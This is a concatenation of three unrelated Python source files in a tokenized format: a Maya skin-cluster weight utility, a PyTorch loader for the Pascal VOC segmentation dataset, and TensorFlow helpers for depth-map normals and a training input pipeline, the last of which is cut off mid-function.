__author__="<NAME>"<line_sep>__contact__="<EMAIL>"<line_sep>__website__="http://riggingtd.com"<import_stmt>maya.cmds<as>cmds<import_stmt>maya.OpenMaya<as>om<import_stmt>maya.OpenMayaAnim<as>oma<import_from_stmt>DLS.core utils<class_stmt>FnSkinCluster(object)<block_start><def_stmt>__init__ self skinCluster=<none><block_start>""" Args: skinCluster (str, Optional): Defaults to None """<line_sep>self.skinCluster=skinCluster<if_stmt>skinCluster<block_start>self.fn=oma.MFnSkinCluster(utils.getDependNode(skinCluster))<block_end><block_end><def_stmt>setSkinCluster self skinCluster<block_start>""" Args: skinCluster (str, Optional): Defaults to None Returns: SkinClusterFn """<line_sep>self.skinCluster=skinCluster<line_sep>self.fn=oma.MFnSkinCluster(utils.getDependNode(skinCluster))<line_sep><return>self<block_end><def_stmt>getLogicalInfluenceIndex self influence<block_start>""" Args: influence (str) Returns: int """<try_stmt><block_start>dagPath=utils.getDagPath(influence)<block_end><except_stmt><block_start><raise>utils.UserInputError("Could not find influence '%s' in %s"%(influence self.skinCluster))<block_end><return>self.fn.indexForInfluenceObject(dagPath)<block_end>#---------------------------------------------------------------------- <def_stmt>getPhysicalInfluenceIndex self influence<block_start>""" Args: influence (str) Returns: int """<line_sep>matrices=cmds.listConnections("%s.matrix"%self.skinCluster s=1 d=0)<line_sep><return>matrices.index(influence)<block_end>#---------------------------------------------------------------------- <def_stmt>getInfluenceData self influence<block_start>""" Args: influence (str) Returns: WeightData """<try_stmt><block_start>dagPath=utils.getDagPath(influence)<block_end><except_stmt><block_start><raise>utils.UserInputError("Could not find influence '%s' in %s"%(influence self.skinCluster))<block_end>selList=om.MSelectionList()<line_sep>weights=om.MDoubleArray()<line_sep>self.fn.getPointsAffectedByInfluence(dagPath selList 
weights)<line_sep>componentStr=[]<line_sep>selList.getSelectionStrings(componentStr)<line_sep>componentStr=cmds.ls(componentStr ap=1 fl=1)<line_sep>weights=[w<for>w weights]<line_sep><return>WeightData(componentStr weights)<block_end>#---------------------------------------------------------------------- <def_stmt>listInfluences self asDagPath=<true><block_start>""" Returns: list """<line_sep>dagPaths=om.MDagPathArray()<line_sep>self.fn.influenceObjects(dagPaths)<if_stmt>asDagPath<block_start><return>dagPaths<block_end><else_stmt><block_start><return>[dagPaths[i].partialPathName()<for>i xrange(dagPaths.length())]<block_end><block_end>#---------------------------------------------------------------------- <def_stmt>getWeightData self elements<block_start>""" Args: elements (list) Returns: SkinWeightData """<line_sep>dagPath,components=utils.getDagPathComponents(elements)<line_sep># Get all influences infs=self.listInfluences(asDagPath=<false>)<line_sep>influenceIndices=om.MIntArray()<line_sep>[influenceIndices.append(self.getPhysicalInfluenceIndex(inf))<for>inf infs]<line_sep># Get all weights weights=om.MDoubleArray()<line_sep>self.fn.getWeights(dagPath components influenceIndices weights)<line_sep>weights=[w<for>w weights]<line_sep><return>SkinWeightData(elements infs weights)<block_end>#---------------------------------------------------------------------- <def_stmt>setWeightData self data normalize=<true><block_start>""" Args: data (SkinWeightData) normalize (bool, Optional): Defaults to True """<line_sep># Construct dagPath and components compList=data.getComponents()<line_sep>dagPath,components=utils.getDagPathComponents(compList)<line_sep># Construct influence indices influenceIndices=om.MIntArray()<line_sep>[influenceIndices.append(self.getPhysicalInfluenceIndex(inf))<for>inf data.getInfluences()]<line_sep># Construct weights weights=om.MDoubleArray()<line_sep>[weights.append(w)<for>w 
data.getWeights()]<line_sep>oldValues=om.MDoubleArray()<line_sep>self.fn.getWeights(dagPath components influenceIndices oldValues)<line_sep>self.fn.setWeights(dagPath components influenceIndices weights normalize oldValues)<block_end>#---------------------------------------------------------------------- <def_stmt>flushWeights self influence<block_start>""" Args: influence (str) """<line_sep>weightData=self.getInfluenceData(influence)<line_sep>skinData=SkinWeightData(weightData.getElements() [influence] weightData.getWeights())<line_sep>[skinData.addInfluence(comp influence 0.0)<for>comp skinData.getComponents()]<line_sep>self.setWeightData(skinData)<block_end>#---------------------------------------------------------------------- <def_stmt>getInfluenceTransforms self space=om.MSpace.kObject<block_start>infs=self.listInfluences()<if_stmt>space<eq>om.MSpace.kWorld<block_start><return>[infs[i].inclusiveMatrix()<for>i xrange(infs.length())]<block_end><return>[om.MFnTransform(infs[i]).transformation().asMatrix()<for>i xrange(infs.length())]<block_end><block_end>
# -*- coding: utf-8 -*- # @Time : 2018/9/21 17:21 # @Author : HLin # @Email : <EMAIL> # @File : Voc_Dataset.py # @Software: PyCharm <import_stmt>PIL<import_stmt>random<import_stmt>scipy.io<import_from_stmt>PIL Image ImageOps ImageFilter<import_stmt>numpy<as>np<import_stmt>cv2<import_stmt>os<import_stmt>torch<import_stmt>torch.utils.data<as>data<import_stmt>torchvision.transforms<as>ttransforms<class_stmt>Voc_Dataset(data.Dataset)<block_start><def_stmt>__init__ self root_path='/data/linhua/VOCdevkit' dataset='voc2012_aug' base_size=513 crop_size=513 is_training=<true><block_start>""" :param root_path: :param dataset: :param base_size: :param is_trainging: :param transforms: """<line_sep>self.dataset=dataset<line_sep>self.is_training=is_training<line_sep>self.base_size=base_size<line_sep>self.crop_size=crop_size<if_stmt>self.dataset<eq>'voc2007'<block_start>self.data_path=os.path.join(root_path "VOC2007")<if_stmt>is_training<block_start>item_list_filepath=os.path.join(self.data_path "ImageSets/Segmentation/trainval.txt")<block_end><else_stmt><block_start>item_list_filepath=os.path.join(self.data_path "ImageSets/Segmentation/test.txt")<block_end><block_end><elif_stmt>self.dataset<eq>'voc2012'<block_start>self.data_path=os.path.join(root_path "VOC2012")<if_stmt>is_training<block_start>item_list_filepath=os.path.join(self.data_path "ImageSets/Segmentation/train.txt")<block_end><else_stmt><block_start>item_list_filepath=os.path.join(self.data_path "ImageSets/Segmentation/val.txt")<block_end><block_end><elif_stmt>self.dataset<eq>'voc2012_aug'<block_start>self.data_path=os.path.join(root_path "VOC2012")<if_stmt>is_training<block_start>item_list_filepath=os.path.join(self.data_path "ImageSets/Segmentation/train_aug.txt")<block_end><else_stmt><block_start>item_list_filepath=os.path.join(self.data_path "ImageSets/Segmentation/val_aug.txt")<block_end><block_end><else_stmt><block_start><raise>Warning("dataset must be voc2007 or voc2012 or 
voc2012_aug")<block_end>self.image_filepath=os.path.join(self.data_path "JPEGImages")<line_sep>self.gt_filepath=os.path.join(self.data_path "SegmentationClassAug")<line_sep>self.items=[id.strip()<for>id open(item_list_filepath)]<line_sep>self.classes=['aeroplane' 'bicycle' 'bird' 'boat' 'bottle' 'bus' 'car' 'cat' 'chair' 'cow' 'diningtable' 'dog' 'horse' 'motorbike' 'person' 'pottedplant' 'sheep' 'sofa' 'train' 'tvmonitor']<block_end><def_stmt>__getitem__ self item<block_start>id=self.items[item]<line_sep>gt_image_path=os.path.join(self.gt_filepath "{}.png".format(id))<line_sep>gt_image=Image.open(gt_image_path)<line_sep>image_path=os.path.join(self.image_filepath "{}.jpg".format(id))<line_sep>image=Image.open(image_path).convert("RGB")<if_stmt>self.is_training<block_start>image,gt_image=self._train_sync_transform(image gt_image)<block_end><else_stmt><block_start>image,gt_image=self._val_sync_transform(image gt_image)<block_end><return>image gt_image id<block_end><def_stmt>_train_sync_transform self img mask<block_start>''' :param image: PIL input image :param gt_image: PIL input gt_image :return: '''<line_sep># random mirror <if_stmt>random.random()<l>0.5<block_start>img=img.transpose(Image.FLIP_LEFT_RIGHT)<line_sep>mask=mask.transpose(Image.FLIP_LEFT_RIGHT)<block_end>crop_size=self.crop_size<line_sep># random scale (short edge) short_size=random.randint(int(self.base_size<times>0.5) int(self.base_size<times>2.0))<line_sep>w,h=img.size<if_stmt>h<g>w<block_start>ow=short_size<line_sep>oh=int(1.0<times>h<times>ow/w)<block_end><else_stmt><block_start>oh=short_size<line_sep>ow=int(1.0<times>w<times>oh/h)<block_end>img=img.resize((ow oh) Image.BILINEAR)<line_sep>mask=mask.resize((ow oh) Image.NEAREST)<line_sep># pad crop <if_stmt>short_size<l>crop_size<block_start>padh=crop_size-oh<if>oh<l>crop_size<else>0<line_sep>padw=crop_size-ow<if>ow<l>crop_size<else>0<line_sep>img=ImageOps.expand(img border=(0 0 padw padh) fill=0)<line_sep>mask=ImageOps.expand(mask border=(0 0 
padw padh) fill=0)<block_end># random crop crop_size w,h=img.size<line_sep>x1=random.randint(0 w-crop_size)<line_sep>y1=random.randint(0 h-crop_size)<line_sep>img=img.crop((x1 y1 x1+crop_size y1+crop_size))<line_sep>mask=mask.crop((x1 y1 x1+crop_size y1+crop_size))<line_sep># gaussian blur as in PSP <if_stmt>random.random()<l>0.5<block_start>img=img.filter(ImageFilter.GaussianBlur(radius=random.random()))<block_end># final transform img,mask=self._img_transform(img) self._mask_transform(mask)<line_sep><return>img mask<block_end><def_stmt>_val_sync_transform self img mask<block_start>outsize=self.crop_size<line_sep>short_size=outsize<line_sep>w,h=img.size<if_stmt>w<g>h<block_start>oh=short_size<line_sep>ow=int(1.0<times>w<times>oh/h)<block_end><else_stmt><block_start>ow=short_size<line_sep>oh=int(1.0<times>h<times>ow/w)<block_end>img=img.resize((ow oh) Image.BILINEAR)<line_sep>mask=mask.resize((ow oh) Image.NEAREST)<line_sep># center crop w,h=img.size<line_sep>x1=int(round((w-outsize)/2.))<line_sep>y1=int(round((h-outsize)/2.))<line_sep>img=img.crop((x1 y1 x1+outsize y1+outsize))<line_sep>mask=mask.crop((x1 y1 x1+outsize y1+outsize))<line_sep># final transform img,mask=self._img_transform(img) self._mask_transform(mask)<line_sep><return>img mask<block_end><def_stmt>_img_transform self image<block_start>image_transforms=ttransforms.Compose([ttransforms.ToTensor() ttransforms.Normalize([.485 .456 .406] [.229 .224 .225]) ])<line_sep>image=image_transforms(image)<line_sep><return>image<block_end><def_stmt>_mask_transform self gt_image<block_start>target=np.array(gt_image).astype('int32')<line_sep>target=torch.from_numpy(target)<line_sep><return>target<block_end><def_stmt>__len__ self<block_start><return>len(self.items)<block_end><block_end><class_stmt>VOCDataLoader()<block_start><def_stmt>__init__ self args<block_start>self.args=args<line_sep>train_set=Voc_Dataset(dataset=self.args.dataset base_size=self.args.base_size crop_size=self.args.crop_size 
is_training=<true>)<line_sep>val_set=Voc_Dataset(dataset=self.args.dataset base_size=self.args.base_size crop_size=self.args.crop_size is_training=<false>)<line_sep>self.train_loader=data.DataLoader(train_set batch_size=self.args.batch_size shuffle=<true> num_workers=self.args.data_loader_workers pin_memory=self.args.pin_memory drop_last=<true>)<line_sep>self.valid_loader=data.DataLoader(val_set batch_size=self.args.batch_size shuffle=<false> num_workers=self.args.data_loader_workers pin_memory=self.args.pin_memory drop_last=<true>)<line_sep>self.train_iterations=(len(train_set)+self.args.batch_size)<floordiv>self.args.batch_size<line_sep>self.valid_iterations=(len(val_set)+self.args.batch_size)<floordiv>self.args.batch_size<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>data=scipy.io.loadmat('/data/linhua/VOCdevkit/BSD/dataset/cls/2008_003846.mat')<line_sep>print(data['GTcls']["Segmentation"][0 0])<line_sep>print(np.array([[(1 2 3)]]).shape)<line_sep>print(np.array([[np.array(1) np.array(2) np.array(3)]]).shape)<block_end>
<import_stmt>numpy<as>np<import_stmt>sys<import_stmt>tensorflow<as>tf<line_sep>slim=tf.contrib.slim<def_stmt>convertNHWC2NCHW data name<block_start>out=tf.transpose(data [0 3 1 2] name=name)<line_sep><return>out<block_end><def_stmt>convertNCHW2NHWC data name<block_start>out=tf.transpose(data [0 2 3 1] name=name)<line_sep><return>out<block_end><def_stmt>denormalize batch_input low_thres up_thres zero2one=<false> rm_zeros=<false> eps=10.0# denormalize depth from [-1, 1] to real depth. <block_start><if_stmt><not>zero2one# [-1, 1] <block_start>rel_input=(batch_input+1.0)/2.0<block_end><else_stmt># [0, 1] <block_start>rel_input=batch_input<block_end>denormalized=rel_input<times>(up_thres-low_thres)+low_thres<if_stmt>rm_zeros<block_start>low_mask=tf.less(denormalized low_thres+eps name='low_mask')<line_sep>zero_const=tf.zeros_like(denormalized)<line_sep>denormalized=tf.where(low_mask zero_const denormalized)<block_end><return>denormalized<block_end><def_stmt>compute_normals depth config conv=<false> eps=1e-4# convert NHWC depth to NCHW normal <block_start><with_stmt>tf.variable_scope("depth_to_normal")<block_start>intrinsics=tf.constant([[536.628/640.0 536.606/480.0 310.591/640.0 234.759/480.0]])<line_sep>intrinsics=tf.tile(intrinsics [config.batch_size 1])<line_sep>depth_real=convertNHWC2NCHW(denormalize(depth low_thres=config.low_thres up_thres=config.up_thres) name='depth_NCHW')<line_sep>normals=depth_to_normals_tf(depth_real intrinsics)<if_stmt>conv<block_start>kernel_size=3<line_sep>stride=1<line_sep>in_channels=normals.get_shape()[1]<assert_stmt>in_channels<eq>3 'normals should have 3 channel instead of {}.'.format(in_channels)<line_sep>normal_filter=tf.get_variable("filter" [kernel_size kernel_size 1 1] dtype=tf.float32 initializer=tf.constant_initializer(1.0/(kernel_size<times>kernel_size)) trainable=<false>)<line_sep>normals1,normals2,normals3=tf.split(convertNCHW2NHWC(normals 'normals_NHWC') 3 axis=3)<line_sep>normals1=tf.nn.conv2d(normals1 normal_filter [1 
stride stride 1] 'SAME' name='normal_conv_r')<line_sep>normals2=tf.nn.conv2d(normals2 normal_filter [1 stride stride 1] 'SAME' name='normal_conv_g')<line_sep>normals3=tf.nn.conv2d(normals3 normal_filter [1 stride stride 1] 'SAME' name='normal_conv_b')<line_sep>normals=tf.concat([normals1 normals2 normals3] 3)<line_sep>unused=tf.less(tf.norm(normals axis=3) np.sqrt(eps))<line_sep>unused=tf.stack([unused]<times>3 axis=3)<line_sep>normals=tf.nn.l2_normalize(normals 3 epsilon=eps name='normalize_normals')<line_sep>normals=tf.where(unused tf.zeros_like(normals) normals)<line_sep>normals=convertNHWC2NCHW(normals name='normals_NCHW')<block_end><return>normals<block_end><block_end><def_stmt>depth_to_normals_tf depth intrinsics scope=<none> eps=1e-4<block_start>""" :param depth: real depth (B,1,H,W) :param intrinsics: (B,4) :return: normals (B,3,H,W) """<with_stmt>tf.name_scope(scope 'depth_to_normals_tf' [depth intrinsics])<block_start>H,W=depth.shape.as_list()[-2:]<line_sep>B=tf.shape(depth)[0]# config.batch_size depth=tf.reshape(depth [B H W])<line_sep># fx_rel = fx_abs / W, cx_real = cx_abs / W fx,fy,cx,cy=tf.split(tf.expand_dims(intrinsics 2) 4 axis=1)# (B,1,1) inv_fx=tf.div(1.0 fx<times>W)<line_sep>inv_fy=tf.div(1.0 fy<times>H)<line_sep>cx=cx<times>W<line_sep>cy=cy<times>H<line_sep>X,Y=tf.meshgrid(tf.range(W) tf.range(H))<line_sep>X=tf.cast(tf.tile(tf.expand_dims(X axis=0) [B 1 1]) tf.float32)# (B,H,W) Y=tf.cast(tf.tile(tf.expand_dims(Y axis=0) [B 1 1]) tf.float32)<line_sep>x_cord=(X-cx)<times>inv_fx<times>depth<line_sep>y_cord=(Y-cy)<times>inv_fy<times>depth<line_sep>p=tf.stack([x_cord y_cord depth] axis=3 name='p_3d')# (B,H,W,3) # vector of p_3d in west, south, east, north direction p_ctr=p[: 1:-1 1:-1 :]<line_sep>vw=p_ctr-p[: 1:-1 2: :]<line_sep>vs=p[: 2: 1:-1 :]-p_ctr<line_sep>ve=p_ctr-p[: 1:-1 :-2 :]<line_sep>vn=p[: :-2 1:-1 :]-p_ctr<line_sep>normal_1=tf.cross(vs vw name='cross_1')# (B,H-2,W-2,3) normal_2=tf.cross(vn ve 
name='cross_2')<line_sep>normal_1=tf.nn.l2_normalize(normal_1 3 epsilon=eps)<line_sep>normal_2=tf.nn.l2_normalize(normal_2 3 epsilon=eps)<line_sep>normal=normal_1+normal_2<line_sep># unused = tf.less(tf.norm(normal, axis=3), np.sqrt(eps)) # unused = tf.stack([unused] * 3, axis=3) normal=tf.nn.l2_normalize(normal 3 epsilon=eps name='normal')<line_sep># normal = tf.where(unused, tf.zeros_like(normal), normal) paddings=[[0 0] [1 1] [1 1] [0 0]]<line_sep>normal=tf.pad(normal paddings)# (B,H,W,3) normal=convertNHWC2NCHW(normal 'normal_NCHW')<line_sep><return>normal<block_end><block_end><def_stmt>instance_norm input<block_start><with_stmt>tf.variable_scope("instance_norm")<block_start>input=tf.identity(input)<line_sep>channels=input.get_shape()[3]<line_sep>shift=tf.get_variable("shift" [channels] dtype=tf.float32 initializer=tf.zeros_initializer())<line_sep>scale=tf.get_variable("scale" [channels] dtype=tf.float32 initializer=tf.random_normal_initializer(1.0 0.02))<line_sep>mean,variance=tf.nn.moments(input [1 2] keep_dims=<true>)<line_sep>variance_epsilon=1e-5<line_sep>normalized=tf.nn.batch_normalization(input mean variance shift scale variance_epsilon=variance_epsilon name='instancenorm')<line_sep><return>normalized<block_end><block_end>@slim.add_arg_scope<def_stmt>lrelu inputs leak=0.2 scope="lrelu"<block_start>""" For tf > 1.4, use tf.nn.leaky_relu() decorate a func with slim.add_arg_scope so that it can be used within an arg_scope in a slim way. 
"""<with_stmt>tf.variable_scope(scope)<block_start>f1=0.5<times>(1+leak)<line_sep>f2=0.5<times>(1-leak)<line_sep><return>f1<times>inputs+f2<times>abs(inputs)<block_end><block_end><def_stmt>conv_bn_relu batch_input kernel_size stride out_channels=<none><block_start><with_stmt>tf.variable_scope("conv_bn_relu")<block_start>in_channels=batch_input.get_shape()[3]<if_stmt><not>out_channels<block_start>out_channels=in_channels<block_end>filter=tf.get_variable("filter" [kernel_size kernel_size in_channels out_channels] dtype=tf.float32 initializer=tf.random_normal_initializer(0 0.02))<line_sep>convolved=tf.nn.conv2d(batch_input filter [1 stride stride 1] padding="SAME")<line_sep>normed=batchnorm_u(convolved)<line_sep>rectified=tf.nn.relu(normed)<line_sep><return>rectified filter<block_end><block_end><def_stmt>resize_conv x out_ch k_size size_factor<block_start>_,in_h,in_w,in_ch=x.shape.as_list()<line_sep>resized=tf.image.resize_nearest_neighbor(x [in_h<times>size_factor in_w<times>size_factor])<line_sep>conv=conv_act(resized out_ch k_size 1)<line_sep><return>conv<block_end><def_stmt>resize_add_conv_u input size_factor out_ch=<none> k_size=3 axis=3 act=tf.nn.relu<block_start>""" Bilinear Additive Upsampling. see: Wojna, Zbigniew, et al. "The Devil is in the Decoder." arXiv preprint arXiv:1707.05847 (2017). 
"""<with_stmt>tf.variable_scope("resize_add_conv")<as>scp<block_start>_,in_height,in_width,in_ch=input.shape.as_list()<if_stmt>out_ch<block_start><assert_stmt>in_ch%out_ch<eq>0 'cannot add in_ch: {} to out_ch: {}'.format(in_ch out_ch)<block_end><else_stmt><block_start>out_ch,r=divmod(in_ch (size_factor<times>size_factor))<assert_stmt>r<eq>0 'in_ch: {} not divisible by size_factor^2'.format(in_ch)<block_end>ch_split=in_ch/out_ch<line_sep># bilinear upsample resized=tf.image.resize_images(input [in_height<times>size_factor in_width<times>size_factor])<line_sep>stack_list=[]<for_stmt>i range(out_ch)<block_start>resized_split=resized[: : : i<times>ch_split:(i+1)<times>ch_split]<line_sep>stack_list.append(tf.reduce_sum(resized_split axis=axis))<block_end>stacked=tf.stack(stack_list axis=axis)<line_sep>filter=tf.get_variable("filter" [k_size k_size out_ch out_ch] dtype=tf.float32 initializer=tf.random_normal_initializer(0 0.02))<line_sep>conv=tf.nn.conv2d(stacked filter [1 1 1 1] padding="SAME")<if_stmt>act<is><not><none><block_start>conv=tf.nn.relu(conv)<block_end><return>conv<block_end><block_end><def_stmt>conv_concat input skip axis conv=<true><block_start><with_stmt>tf.variable_scope("concat")<block_start>in_ch=input.shape[3]<if_stmt>conv<block_start>skip,_=conv_bn_relu(skip 3 1 out_channels=in_ch)<block_end><return>tf.concat([input skip] axis)<block_end><block_end><def_stmt>resize_like inputs ref method='NN'<block_start>iH,iW=inputs.shape[1] inputs.shape[2]<line_sep>rH,rW=ref.shape[1] ref.shape[2]<if_stmt>iH<eq>rH<and>iW<eq>rW<block_start><return>inputs<block_end><if_stmt>method<eq>'NN'<block_start><return>tf.image.resize_nearest_neighbor(inputs [rH.value rW.value])<block_end><elif_stmt>method<eq>'BI'<block_start><return>tf.image.resize_bilinear(inputs [rH.value rW.value])<block_end><else_stmt><block_start><raise>NotImplementedError('resize method not implemented yet.')<block_end><block_end><def_stmt>residual_block inputs ch_out stride=1 norm_fn=slim.batch_norm 
outputs_collections=<none> scope=<none><block_start>""" Residual_block with pre-activation. see resnet_model.py for more detailed version. """<with_stmt>tf.variable_scope(scope "residual_block")<as>scp<block_start>shortcut=tf.identity(inputs name="shortcut")<if_stmt>norm_fn<block_start>preact=norm_fn(inputs activation_fn=tf.nn.relu scope="preact")<block_end><else_stmt><block_start>preact=tf.nn.relu(inputs name="preact")<block_end>residual=slim.conv2d(preact ch_out [3 3] stride=stride normalizer_fn=norm_fn activation_fn=tf.nn.relu scope="conv1")<line_sep>residual=slim.conv2d(residual ch_out [3 3] stride=stride normalizer_fn=<none> activation_fn=<none> scope="conv2")<line_sep>output=shortcut+residual<block_end><return>output<block_end><def_stmt>rand_shift_depth depths low_th up_th seed=666<block_start>""" :param depths: list of depth maps to be randomly shifted together. depths values shoud be in range [low_th, up_th] :return: list of shifted depth maps """<if_stmt>len(depths)<g>1<block_start>depth_ref=depths[1]<block_end><else_stmt><block_start>depth_ref=depths[0]<block_end>ref_min=tf.reduce_min(depth_ref)<line_sep>ref_max=tf.reduce_max(depth_ref)<line_sep>shift_min=low_th-ref_min<line_sep>shift_max=up_th-ref_max<line_sep>shift_val=tf.random_uniform([] minval=shift_min maxval=shift_max seed=seed name='shift_val')<line_sep>depths_shifted=[tf.clip_by_value(d+shift_val low_th up_th)<for>d depths]<line_sep><return>depths_shifted<block_end><def_stmt>read_image_from_filename filename batch_size num_threads=4 has_mask=<true> has_abd=<false> aux_type="JPEG" depth_type=tf.uint16 low_th=500.0 up_th=3000.0 diff_th=5.0 output_height=256 output_width=256 min_after_dequeue=128 use_shuffle_batch=<false> rand_crop=<true> rand_scale=<false> rand_depth_shift=<false> rand_flip=<true> rand_brightness=<true> scope=<none><block_start>""" :param filename: index csv file for training. :param batch_size: 16 or 32 recommended for Titan X. :param num_threads: 4 or 8. 
:param has_mask: single channel [0, 255]. offline mask obtained by threshold, instance segmentation or other methods. :param has_abd: offline albedo obtained by intrinsic decomposition methods, if False assume uniform albedo. :param aux_type: auxiliary(e.g. color) image file type. :param depth_type: data type of depth maps. :param low_th: limited lower bound of depth range. :param up_th: limited upper bound of depth range. :param diff_th: threshold to reject bad training pairs with large L1 diff. :param output_height: patch height. :param output_width: patch width. :param min_after_dequeue: see docs of tf.train.shuffle_batch. :param use_shuffle_batch: see docs of tf.train.shuffle_batch. :param rand_crop: random cropping patches for training, change cx, cy. :param rand_flip: random flipping patches, change cx, cy. :param rand_scale: random scaling, change fx, fy, cx, cy. :param rand_depth_shift: only shift depth value, no change in intrinsics. :param rand_brightness: augment color image. :param scope: visualize graphs in tensorboard. 
:return: depth_raw_batch, depth_ref_batch, color_batch, mask_batch, albedo_batch """<with_stmt>tf.variable_scope(scope "image_producer")# Load index csv file <block_start>textReader=tf.TextLineReader()<line_sep>csv_path=tf.train.string_input_producer([filename] shuffle=<true>)<line_sep>_,csv_content=textReader.read(csv_path)<if_stmt>has_mask<and>has_abd<block_start>depth_raw_filename,depth_ref_filename,color_filename,mask_filename,albedo_filename=tf.decode_csv(csv_content [[""] [""] [""] [""] [""]])<block_end><elif_stmt>has_mask<block_start>depth_raw_filename,depth_ref_filename,color_filename,mask_filename=tf.decode_csv(csv_content [[""] [""] [""] [""]])<block_end><else_stmt><block_start>depth_raw_filename,depth_ref_filename,color_filename=tf.decode_csv(csv_content [[""] [""] [""]])<block_end># Read and decode image data to tf.float32 tensor depth_raw_data=tf.read_file(depth_raw_filename)<line_sep>depth_ref_data=tf.read_file(depth_ref_filename)<line_sep>color_data=tf.read_file(color_filename)<line_sep>depth_raw_im=tf.image.decode_png(depth_raw_data channels=1 dtype=depth_type)<line_sep>depth_ref_im=tf.image.decode_png(depth_ref_data channels=1 dtype=depth_type)<if_stmt>has_mask<block_start>mask_data=tf.read_file(mask_filename)<line_sep>mask=tf.image.decode_png(mask_data channels=1)/255<line_sep>mask=tf.cast(mask tf.float32)<block_end><if_stmt>has_abd<block_start>albedo_data=tf.read_file(albedo_filename)<line_sep>albedo_im=tf.image.decode_png(albedo_data channels=1)<line_sep>albedo_im=tf.cast(albedo_im tf.float32)<block_end><if_stmt>aux_type<eq>"JPEG"<block_start>color_im=tf.image.decode_jpeg(color_data channels=1)<block_end><elif_stmt>aux_type<eq>"PNG"<block_start>color_im=tf.image.decode_png(color_data channels=1)<block_end><else_stmt><block_start><raise>NotImplementedError("unsupport auxiliary image type for now!")<block_end>depth_raw_im=tf.cast(depth_raw_im tf.float32)<line_sep>depth_ref_im=tf.cast(depth_ref_im tf.float32)<line_sep>color_im=tf.cast(color_im 
tf.float32)<line_sep># color_im = tf.image.resize_images(color_im, depth_raw_shape[:2], method=2) # return float Tensor # Concat all images in channel axis to randomly crop together <if_stmt>has_mask<and>has_abd<block_start>concated_im=tf.concat([depth_raw_im depth_ref_im color_im mask albedo_im] axis=2)<line_sep>n_concat=5<block_end><elif_stmt>has_mask<block_start>concated_im=tf.concat([depth_raw_im depth_ref_im color_im mask] axis=2)<line_sep>n_concat=4<block_end><else_stmt><block_start>concated_im=tf.concat([depth_raw_im depth_ref_im color_im] axis=2)<line_sep>n_concat=3<block_end># Prepose rand_crop here to reduce unnecessary computation of subsequent data augmentations. <if_stmt>rand_crop<block_start>concated_im=tf.random_crop(concated_im [output_height output_width n_concat])<line_sep># concated_im = tf.image.crop_to_bounding_box(concated_im, 80, 250, output_height, output_width) # dbg <block_end><else_stmt><block_start>concated_im=tf.image.resize_image_with_crop_or_pad(concated_im output_height output_width)<block_end><if_stmt>has_mask<and>has_abd<block_start>depth_raw_im,depth_ref_im,color_im,mask,albedo_im=tf.split(concated_im n_concat axis=2)<block_end><elif_stmt>has_mask<block_start>depth_raw_im,depth_ref_im,color_im,mask=tf.split(concated_im n_concat axis=2)<block_end><else_stmt><block_start>depth_raw_im,depth_ref_im,color_im=tf.split(concated_im 3 axis=2)<block_end># Filter bad inputs use diff_mean or mse n_holes=tf.count_nonzero(tf.less(depth_ref_im tf.constant(50.0)) dtype=tf.float32)<line_sep>diff=tf.abs(tf.subtract(depth_raw_im depth_ref_im name='diff'))<line_sep>diff=tf.where(diff<l>up_th/10 diff tf.zeros_like(diff))<line_sep>diff_mean=tf.reduce_mean(diff name='diff_mean')<line_sep># mse = tf.reduce_mean(tf.square(diff), name='mse') enqueue_cond=tf.logical_and(tf.less(n_holes output_height<times>output_width<times>2/3) tf.less(diff_mean diff_th))<def_stmt>zero_img <block_start><return>tf.constant(0 shape=[0 output_height output_width 
n_concat])<block_end><def_stmt>one_img # Data augmentation: rand_flip, rand_scale and rand_depth_shift on filtered patches. <block_start>raw=tf.clip_by_value(depth_raw_im low_th up_th)<line_sep>ref=tf.clip_by_value(depth_ref_im low_th up_th)<if_stmt>rand_brightness<block_start>color=tf.image.random_brightness(color_im 20)<block_end><else_stmt><block_start>color=color_im<block_end><if_stmt>rand_depth_shift<block_start>raw,ref=rand_shift_depth([raw ref] low_th up_th)<block_end><if_stmt>has_mask<and>has_abd<block_start>im=tf.concat([raw ref color mask abd] axis=2)<block_end><elif_stmt>has_mask<block_start>im=tf.concat([raw ref color mask] axis=2)<block_end><else_stmt><block_start>im=tf.concat([raw ref color] axis=2)<block_end><if_stmt>rand_flip<block_start>im=tf.image.random_flip_left_right(im)<block_end><if_stmt>rand_scale<block_start><pass><block_end><return>tf.expand_dims(im 0)<block_end>concated_im=tf.cond(enqueue_cond one_img zero_img)<line_sep>## Pass the 4D batch tensors to a batching op at the end of input data queue # shuffle_batch creates a shuffling queue with dequeue op and enqueue QueueRunner # min_after_dequeue defines how big a buffer we will randomly sample from # bigger means better shuffling but slower start up and more memory used. # capacity must be larger than min_after_dequeue and the amount larger # determines the maximum we will prefetch. 
# capacity = min_after_dequeue + (num_threads + small_safety_margin) * batch_size <if_stmt>use_shuffle_batch<block_start>capacity=min_after_dequeue+(num_threads+1)<times>batch_size<line_sep>im_batch=tf.train.shuffle_batch([concated_im] batch_size=batch_size capacity=capacity enqueue_many=<true> num_threads=num_threads min_after_dequeue=min_after_dequeue allow_smaller_final_batch=<true> name="shuffle_batch")<block_end><else_stmt><block_start>im_batch=tf.train.batch([concated_im] batch_size=batch_size num_threads=num_threads allow_smaller_final_batch=<true> enqueue_many=<true> name="batch")<block_end># Split concatenated data <if_stmt>has_mask<and>has_abd<block_start>depth_raw_batch,depth_ref_batch,color_batch,mask_batch,albedo_batch=tf.split(im_batch n_concat axis=3)<block_end><elif_stmt>has_mask<block_start>depth_raw_batch,depth_ref_batch,color_batch,mask_batch=tf.split(im_batch n_concat axis=3)<block_end><else_stmt># get mask only from ref(after clip, outliers are equal to low_th) <block_start>depth_raw_batch,depth_ref_batch,color_batch=tf.split(im_batch n_concat axis=3)<line_sep>mask_batch=tf.cast(tf.not_equal(depth_ref_batch low_th) tf.float32 name='mask_batch')<block_end># 0.0 or 1.0 # Normalize depth and color maps <with_stmt>tf.name_scope('normalize')<block_start>thres_range=(up_th-low_th)/2.0<line_sep>depth_raw_batch=(depth_raw_batch-low_th)/thres_range<line_sep>depth_raw_batch=tf.subtract(depth_raw_batch 1.0 name='raw_batch')# [low,up]->[-1,1] depth_ref_batch=(depth_ref_batch-low_th)/thres_range<line_sep>depth_ref_batch=tf.subtract(depth_ref_batch 1.0 name='ref_batch')# [low,up]->[-1,1] color_batch=color_batch<times>mask_batch/127.0<line_sep>color_batch=tf.subtract(color_batch 1.0 name='aux_batch')# [0,255]->[-1,1] <if_stmt>has_abd<block_start>albedo_batch=albedo_batch/127.0# offline estimated albedo from RGB, [0,255]->[0,2] 